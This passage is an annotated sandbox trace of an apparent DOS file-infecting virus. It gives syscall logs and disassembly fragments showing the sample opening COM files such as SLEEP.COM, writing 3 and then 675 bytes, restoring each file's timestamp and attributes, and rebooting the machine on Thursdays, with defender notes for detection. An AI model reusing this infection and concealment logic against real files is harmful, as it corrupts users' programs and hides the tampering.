; NOTE(review): DH is the month for AH=2Ah and never exceeds 12, so the bound of 14
; below appears never to skip anything; possibly DL (day) was intended -- confirm.
0x12aca: cmp dh, 0xe
0x12acd: ja 0x12ae0
0x12acf: mov ax, 0x40
0x12ad2: mov ds, ax    ; DS = 0040h, the BIOS data area segment
0x12ad4: mov word ptr [0x72], 0    ; 0040:0072 is the BIOS reset flag; a value other than 1234h means cold boot
0x12ada: ljmp 0xffff:0    ; far jump to the reset entry FFFF:0000 -> machine restarts
0x12adf: retf    ; follows an unconditional far jump; presumably unreachable
; AH=25h set interrupt vector, AL=24h: INT 24h is the DOS critical-error handler.
; The trace's label for vector 36, 'Set random record number', is the name of
; DOS function 24h, not of this vector.
0x12ae0: mov ax, 0x2524
; DS:DX = far pointer stored at bp+0x446 -- presumably the handler address saved by
; the Get interrupt vector call at the start of the trace; confirm.
0x12ae3: lds dx, ptr [bp + 0x446]
0x12ae7: int 0x21
0x12ae9: push cs
0x12aea: pop ds    ; DS = CS (the lds above overwrote DS)
; DS:DX -> buffer at bp+0x3c2 -- presumably the directory recorded by
; Get current directory earlier in the trace; confirm.
0x12aeb: lea dx, word ptr [bp + 0x3c2]
0x12aef: mov ah, 0x3b    ; AH=3Bh change current directory
0x12af1: int 0x21
0x12af3: mov dx, 0x80    ; offset 80h is the default DTA in the PSP (assumes CS is the PSP segment)
0x12af6: call 0x12c4b    ; 0x12c4b starts with mov ah, 0x1a (set DTA) in the Get time window on this page
0x12af9: cmp sp, 0x4b50    ; window ends here; the instruction that consumes this compare is not shown
2018-12-25T11:59:44.79878059Z 37 PC: 12ae9 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:44.79982025Z 59 PC: 12af3 | Change current directory
2018-12-25T11:59:44.80275132Z 26 PC: 12c4f | Set disk transfer address (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":6496,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:59:44.219251983Z 26 PC: 12c4f | Set disk transfer address
2018-12-25T11:59:44.221566727Z 53 PC: 12a8e | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:44.22309003Z 37 PC: 12a9e | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:44.224464976Z 71 PC: 12aaa | Get current directory
2018-12-25T11:59:44.228235441Z 78 PC: 12b32 | Find first file
2018-12-25T11:59:44.244722923Z 78 PC: 12b32 | Find first file (See above)
2018-12-25T11:59:44.251414411Z 61 PC: 12c58 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:59:44.259113803Z 63 PC: 12b4d | Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:59:44.267655404Z 62 PC: 12b51 | Close file
2018-12-25T11:59:44.270037569Z 67 PC: 12c63 | Get or set file attributes
2018-12-25T11:59:44.288098476Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.299962258Z 64 PC: 12c10 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:59:44.302459974Z 66 PC: 12c4a | Move file pointer
; Disassembly window after the INT 21h AH=2Ch (Get time) call logged at PC 12c1b,
; inside the path that modifies the opened file (handle 5 in the trace).
; For AH=2Ch DOS returns CH = hour, CL = minute, DH = seconds, DL = hundredths.
; NOTE(review): bp+0x417 / +0x418 / +0x41a are spaced like the attribute (15h),
; time (16h) and date (18h) fields of a DOS find-first record based at bp+0x402
; -- presumably the target file's original metadata; confirm.
; Defender note: the trace shows a 3-byte write right after open and a 675-byte
; write after the seek, followed by the date/time and attribute calls below, so
; the file's timestamp and attributes may look unchanged afterwards; compare
; size and content hashes rather than modification time.
2018-12-25T11:59:44.303991031Z 44 PC: 12c1b | Get time 0x12c1b: cmp dh, 0    ; DH = seconds from Get time
; 0x12c17 is outside this window; it lies 4 bytes before the call's return
; address, so this presumably re-issues Get time until seconds != 0.
0x12c1e: je 0x12c17
0x12c20: mov byte ptr [bp + 0x3a5], dh    ; keep the non-zero seconds byte; its consumer is not visible here -- TODO confirm in 0x12c9d
; Callee is outside this window; the 675-byte write is logged at PC 12cf9,
; so it presumably happens inside this call.
0x12c24: call 0x12c9d
0x12c27: mov ax, 0x5701    ; AX=5701h set file date and time (CX = time, DX = date)
0x12c2a: mov cx, word ptr [bp + 0x418]
0x12c2e: mov dx, word ptr [bp + 0x41a]
0x12c32: int 0x21
0x12c34: mov ah, 0x3e    ; AH=3Eh close file
0x12c36: int 0x21
0x12c38: xor cx, cx
0x12c3a: mov cl, byte ptr [bp + 0x417]    ; CX = zero-extended byte from bp+0x417
0x12c3e: call 0x12c5a    ; callee outside this window; the trace logs 'Get or set file attributes' at PC 12c63 next
0x12c41: ret
; Separate helper: AH=42h move file pointer with offset CX:DX = 0; the origin
; in AL is supplied by the caller.
0x12c42: mov ah, 0x42
0x12c44: xor cx, cx
0x12c46: xor dx, dx
0x12c48: int 0x21
0x12c4a: ret
0x12c4b: mov ah, 0x1a    ; start of the set-DTA helper (AH=1Ah); its int 0x21 is past the end of this window
2018-12-25T11:59:44.306832839Z 64 PC: 12cf9 | Write file or device (Write 675 bytes on handle 5)
2018-12-25T11:59:44.314575606Z 87 PC: 12c34 | Get or set file date and time
2018-12-25T11:59:44.315991092Z 62 PC: 12c38 | Close file
2018-12-25T11:59:44.321800791Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.328838849Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.331262097Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.342133481Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.347214312Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.349950888Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.361186335Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.368569737Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.371659148Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.373243048Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.37680605Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.38593506Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.387786725Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.396418503Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.407842359Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.41123772Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.419958853Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.427818332Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.430300022Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.441946773Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.449849311Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.453060711Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.45518202Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.457974711Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.46697082Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.470089204Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.478804611Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.489788133Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.493316034Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.50163553Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.509283835Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.511676382Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.523037602Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.530341101Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.534254574Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.541162862Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.544058583Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.55898182Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.56101163Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.569811024Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.580862439Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.584852428Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.592239745Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.602033197Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.604404965Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.610836799Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.616163974Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.619189498Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.621453992Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.62439466Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.637279428Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.639894106Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.641687871Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.646332456Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.649746659Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.658525336Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.665391548Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.668185295Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.679205005Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.690640549Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.694908837Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.696334743Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.699119952Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.709580372Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.711181887Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.716741521Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.724468366Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.72734605Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.731659403Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.73585282Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.737551226Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.744096277Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.74841416Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.752085327Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.75328051Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.755156657Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.761444343Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.763126701Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.771959808Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.789159061Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.791245329Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.796148213Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.801408461Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.802884241Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.804807005Z 59 PC: 12ac0 | Change current directory
; Disassembly window after the INT 21h AH=2Ah (Get date) call logged at PC 12ac6:
; a date check, a reboot branch, and the clean-up path that the logged run follows.
; For AH=2Ah DOS returns AL = day of week (0 = Sunday), DH = month, DL = day.
; In this run the next logged call is Set interrupt vector at PC 12ae9, so the
; reboot branch (0x12acf-0x12ada) was not taken.
; NOTE(review): bp-relative operands look like the sample's data area addressed
; through a base kept in bp; bp is set outside this window -- confirm.
2018-12-25T11:59:44.808747968Z 42 PC: 12ac6 | Get date 0x12ac6: cmp al, 4    ; day of week == 4 (Thursday)?
0x12ac8: jne 0x12ae0    ; other weekday -> clean-up path
; NOTE(review): DH is the month for AH=2Ah and never exceeds 12, so the bound of 14
; below appears never to skip anything; possibly DL (day) was intended -- confirm.
0x12aca: cmp dh, 0xe
0x12acd: ja 0x12ae0
0x12acf: mov ax, 0x40
0x12ad2: mov ds, ax    ; DS = 0040h, the BIOS data area segment
0x12ad4: mov word ptr [0x72], 0    ; 0040:0072 is the BIOS reset flag; a value other than 1234h means cold boot
0x12ada: ljmp 0xffff:0    ; far jump to the reset entry FFFF:0000 -> machine restarts
0x12adf: retf    ; follows an unconditional far jump; presumably unreachable
; AH=25h set interrupt vector, AL=24h: INT 24h is the DOS critical-error handler.
; The trace's label for vector 36, 'Set random record number', is the name of
; DOS function 24h, not of this vector.
0x12ae0: mov ax, 0x2524
; DS:DX = far pointer stored at bp+0x446 -- presumably the handler address saved by
; the Get interrupt vector call at the start of the trace; confirm.
0x12ae3: lds dx, ptr [bp + 0x446]
0x12ae7: int 0x21
0x12ae9: push cs
0x12aea: pop ds    ; DS = CS (the lds above overwrote DS)
; DS:DX -> buffer at bp+0x3c2 -- presumably the directory recorded by
; Get current directory earlier in the trace; confirm.
0x12aeb: lea dx, word ptr [bp + 0x3c2]
0x12aef: mov ah, 0x3b    ; AH=3Bh change current directory
0x12af1: int 0x21
0x12af3: mov dx, 0x80    ; offset 80h is the default DTA in the PSP (assumes CS is the PSP segment)
0x12af6: call 0x12c4b    ; 0x12c4b starts with mov ah, 0x1a (set DTA) in the Get time window on this page
0x12af9: cmp sp, 0x4b50    ; window ends here; the instruction that consumes this compare is not shown
2018-12-25T11:59:44.810434069Z 37 PC: 12ae9 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:44.811532421Z 59 PC: 12af3 | Change current directory
2018-12-25T11:59:44.813163647Z 26 PC: 12c4f | Set disk transfer address (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":6496,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:59:44.381565188Z 26 PC: 12c4f | Set disk transfer address
2018-12-25T11:59:44.383335435Z 53 PC: 12a8e | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:44.39593101Z 37 PC: 12a9e | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:44.397601363Z 71 PC: 12aaa | Get current directory
2018-12-25T11:59:44.401834933Z 78 PC: 12b32 | Find first file
2018-12-25T11:59:44.41027855Z 78 PC: 12b32 | Find first file (See above)
2018-12-25T11:59:44.418156933Z 61 PC: 12c58 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:59:44.434610045Z 63 PC: 12b4d | Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:59:44.443705645Z 62 PC: 12b51 | Close file
2018-12-25T11:59:44.44620201Z 67 PC: 12c63 | Get or set file attributes
2018-12-25T11:59:44.463340881Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.483138696Z 64 PC: 12c10 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:59:44.485445936Z 66 PC: 12c4a | Move file pointer
; Disassembly window after the INT 21h AH=2Ch (Get time) call logged at PC 12c1b,
; inside the path that modifies the opened file (handle 5 in the trace).
; For AH=2Ch DOS returns CH = hour, CL = minute, DH = seconds, DL = hundredths.
; NOTE(review): bp+0x417 / +0x418 / +0x41a are spaced like the attribute (15h),
; time (16h) and date (18h) fields of a DOS find-first record based at bp+0x402
; -- presumably the target file's original metadata; confirm.
; Defender note: the trace shows a 3-byte write right after open and a 675-byte
; write after the seek, followed by the date/time and attribute calls below, so
; the file's timestamp and attributes may look unchanged afterwards; compare
; size and content hashes rather than modification time.
2018-12-25T11:59:44.486841421Z 44 PC: 12c1b | Get time 0x12c1b: cmp dh, 0    ; DH = seconds from Get time
; 0x12c17 is outside this window; it lies 4 bytes before the call's return
; address, so this presumably re-issues Get time until seconds != 0.
0x12c1e: je 0x12c17
0x12c20: mov byte ptr [bp + 0x3a5], dh    ; keep the non-zero seconds byte; its consumer is not visible here -- TODO confirm in 0x12c9d
; Callee is outside this window; the 675-byte write is logged at PC 12cf9,
; so it presumably happens inside this call.
0x12c24: call 0x12c9d
0x12c27: mov ax, 0x5701    ; AX=5701h set file date and time (CX = time, DX = date)
0x12c2a: mov cx, word ptr [bp + 0x418]
0x12c2e: mov dx, word ptr [bp + 0x41a]
0x12c32: int 0x21
0x12c34: mov ah, 0x3e    ; AH=3Eh close file
0x12c36: int 0x21
0x12c38: xor cx, cx
0x12c3a: mov cl, byte ptr [bp + 0x417]    ; CX = zero-extended byte from bp+0x417
0x12c3e: call 0x12c5a    ; callee outside this window; the trace logs 'Get or set file attributes' at PC 12c63 next
0x12c41: ret
; Separate helper: AH=42h move file pointer with offset CX:DX = 0; the origin
; in AL is supplied by the caller.
0x12c42: mov ah, 0x42
0x12c44: xor cx, cx
0x12c46: xor dx, dx
0x12c48: int 0x21
0x12c4a: ret
0x12c4b: mov ah, 0x1a    ; start of the set-DTA helper (AH=1Ah); its int 0x21 is past the end of this window
2018-12-25T11:59:44.489170224Z 64 PC: 12cf9 | Write file or device (Write 675 bytes on handle 5)
2018-12-25T11:59:44.496504986Z 87 PC: 12c34 | Get or set file date and time
2018-12-25T11:59:44.497721936Z 62 PC: 12c38 | Close file
2018-12-25T11:59:44.504310593Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.511865244Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.51488081Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.522917255Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.531211488Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.53426889Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.546493539Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.554841942Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.558290827Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.560431702Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.56384388Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.573595093Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.57502586Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.584109823Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.595624627Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.59890564Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.607057321Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.614893061Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.617279702Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.630919672Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.638779762Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.64206769Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.644274582Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.646945411Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.656287361Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.658098725Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.668664819Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.680065284Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.683757654Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.689138192Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.694898787Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.700618025Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.710594812Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.718564011Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.722053965Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.72537322Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.728488014Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.738245688Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.740757386Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.749395611Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.761310437Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.76516885Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.770925334Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.775252859Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.777345052Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.780332709Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.783505672Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.786223565Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.787572004Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.789525171Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.796507266Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.797951595Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.799394461Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.802394812Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.804897772Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.815595386Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.820026577Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.821949874Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.829010463Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.834278268Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.83743191Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.838665184Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.840558587Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.847063331Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.848200829Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.853410511Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.860432594Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.86241311Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.867142172Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.871787826Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.873380948Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.881389685Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.889002251Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.893883498Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.894905775Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.896768187Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.902414335Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.903637852Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.909097551Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.915858162Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.917759067Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.922748843Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.932204577Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.934123797Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.936761206Z 59 PC: 12ac0 | Change current directory
; Disassembly window after the INT 21h AH=2Ah (Get date) call logged at PC 12ac6:
; a date check, a reboot branch, and the clean-up path that the logged run follows.
; For AH=2Ah DOS returns AL = day of week (0 = Sunday), DH = month, DL = day.
; In this run the next logged call is Set interrupt vector at PC 12ae9, so the
; reboot branch (0x12acf-0x12ada) was not taken.
; NOTE(review): bp-relative operands look like the sample's data area addressed
; through a base kept in bp; bp is set outside this window -- confirm.
2018-12-25T11:59:44.941626023Z 42 PC: 12ac6 | Get date 0x12ac6: cmp al, 4    ; day of week == 4 (Thursday)?
0x12ac8: jne 0x12ae0    ; other weekday -> clean-up path
; NOTE(review): DH is the month for AH=2Ah and never exceeds 12, so the bound of 14
; below appears never to skip anything; possibly DL (day) was intended -- confirm.
0x12aca: cmp dh, 0xe
0x12acd: ja 0x12ae0
0x12acf: mov ax, 0x40
0x12ad2: mov ds, ax    ; DS = 0040h, the BIOS data area segment
0x12ad4: mov word ptr [0x72], 0    ; 0040:0072 is the BIOS reset flag; a value other than 1234h means cold boot
0x12ada: ljmp 0xffff:0    ; far jump to the reset entry FFFF:0000 -> machine restarts
0x12adf: retf    ; follows an unconditional far jump; presumably unreachable
; AH=25h set interrupt vector, AL=24h: INT 24h is the DOS critical-error handler.
; The trace's label for vector 36, 'Set random record number', is the name of
; DOS function 24h, not of this vector.
0x12ae0: mov ax, 0x2524
; DS:DX = far pointer stored at bp+0x446 -- presumably the handler address saved by
; the Get interrupt vector call at the start of the trace; confirm.
0x12ae3: lds dx, ptr [bp + 0x446]
0x12ae7: int 0x21
0x12ae9: push cs
0x12aea: pop ds    ; DS = CS (the lds above overwrote DS)
; DS:DX -> buffer at bp+0x3c2 -- presumably the directory recorded by
; Get current directory earlier in the trace; confirm.
0x12aeb: lea dx, word ptr [bp + 0x3c2]
0x12aef: mov ah, 0x3b    ; AH=3Bh change current directory
0x12af1: int 0x21
0x12af3: mov dx, 0x80    ; offset 80h is the default DTA in the PSP (assumes CS is the PSP segment)
0x12af6: call 0x12c4b    ; 0x12c4b starts with mov ah, 0x1a (set DTA) in the Get time window on this page
0x12af9: cmp sp, 0x4b50    ; window ends here; the instruction that consumes this compare is not shown
2018-12-25T11:59:44.943867855Z 37 PC: 12ae9 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:44.944932767Z 59 PC: 12af3 | Change current directory
2018-12-25T11:59:44.947368958Z 26 PC: 12c4f | Set disk transfer address (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":6496,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:59:44.447750624Z 26 PC: 12c4f | Set disk transfer address
2018-12-25T11:59:44.44936535Z 53 PC: 12a8e | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:44.452090586Z 37 PC: 12a9e | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:44.45397152Z 71 PC: 12aaa | Get current directory
2018-12-25T11:59:44.458632636Z 78 PC: 12b32 | Find first file
2018-12-25T11:59:44.474146737Z 78 PC: 12b32 | Find first file (See above)
2018-12-25T11:59:44.480966082Z 61 PC: 12c58 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:59:44.487523083Z 63 PC: 12b4d | Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:59:44.495714935Z 62 PC: 12b51 | Close file
2018-12-25T11:59:44.497890338Z 67 PC: 12c63 | Get or set file attributes
2018-12-25T11:59:44.518167974Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.524048704Z 64 PC: 12c10 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:59:44.528505488Z 66 PC: 12c4a | Move file pointer
; Disassembly window after the INT 21h AH=2Ch (Get time) call logged at PC 12c1b,
; inside the path that modifies the opened file (handle 5 in the trace).
; For AH=2Ch DOS returns CH = hour, CL = minute, DH = seconds, DL = hundredths.
; NOTE(review): bp+0x417 / +0x418 / +0x41a are spaced like the attribute (15h),
; time (16h) and date (18h) fields of a DOS find-first record based at bp+0x402
; -- presumably the target file's original metadata; confirm.
; Defender note: the trace shows a 3-byte write right after open and a 675-byte
; write after the seek, followed by the date/time and attribute calls below, so
; the file's timestamp and attributes may look unchanged afterwards; compare
; size and content hashes rather than modification time.
2018-12-25T11:59:44.529695983Z 44 PC: 12c1b | Get time 0x12c1b: cmp dh, 0    ; DH = seconds from Get time
; 0x12c17 is outside this window; it lies 4 bytes before the call's return
; address, so this presumably re-issues Get time until seconds != 0.
0x12c1e: je 0x12c17
0x12c20: mov byte ptr [bp + 0x3a5], dh    ; keep the non-zero seconds byte; its consumer is not visible here -- TODO confirm in 0x12c9d
; Callee is outside this window; the 675-byte write is logged at PC 12cf9,
; so it presumably happens inside this call.
0x12c24: call 0x12c9d
